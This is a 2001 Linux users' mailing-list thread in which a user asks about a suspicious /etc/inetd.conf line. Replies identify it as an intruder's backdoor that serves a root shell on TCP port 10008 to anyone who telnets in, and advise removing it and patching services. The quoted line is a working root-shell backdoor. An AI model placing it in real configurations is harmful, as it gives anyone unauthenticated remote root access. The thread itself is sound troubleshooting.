" # 10008 stream tcp nowait root /bin/sh sh "
if the you telnet to your box at port 10008
you get instant access hehehe. not unless you got your
firewall up and running, or unless someone flushd that
firewall
--- Michael Vincent Pozon <[EMAIL PROTECTED]> wrote:
> dwen,
> you can remove that line and lookup for updated
> versions for any services
> you are running on your system.
>
> i think that's an inetd feature, but in order to
> write to /etc/inetd.conf ,
> a user must have write access to /etc/inetd.conf
> which is normally the root.
> Someone probably exploit your system and got root
> access them added that
> line to /etc/inetd.conf as his backdoor.
>
> Regards,
> Michael Vincent Pozon
> - CIS/CNO/CNI
> Tel # (+65) 7806569
> Pager # 95493318
> Mobile/Text # (+65) 94750962
>
>
> # -----Original Message-----
> # From: dwen [mailto:[EMAIL PROTECTED]]
> # Sent: Tuesday, May 22, 2001 2:39 PM
> # To: [EMAIL PROTECTED]
> # Subject: [plug] inetd
> #
> # file: /etc/inetd.conf
> # i have this line :
> #
> # 10008 stream tcp nowait root /bin/sh sh
> #
> # what will it do ?
> #
> #
> # thanks,
> # dwen
> _
> Philippine Linux Users Group. Web site and archives
> at http://plug.linux.org.ph
> To leave: send "unsubscribe" in the body to
> [EMAIL PROTECTED]
>
> To subscribe to the Linux Newbies' List: send
> "subscribe" in the body to
[EMAIL PROTECTED]
__________________________________________________
Do You Yahoo!?
Yahoo! Auctions - buy the things you want at great prices
http://auctions.yahoo.com/
_
Philippine Linux Users Group. Web site and archives at http://plug.linux.org.ph
To leave: send "unsubscribe" in the body to [EMAIL PROTECTED]
To subscribe to the Linux Newbies' List: send "subscribe" in the body to
[EMAIL PROTECTED]
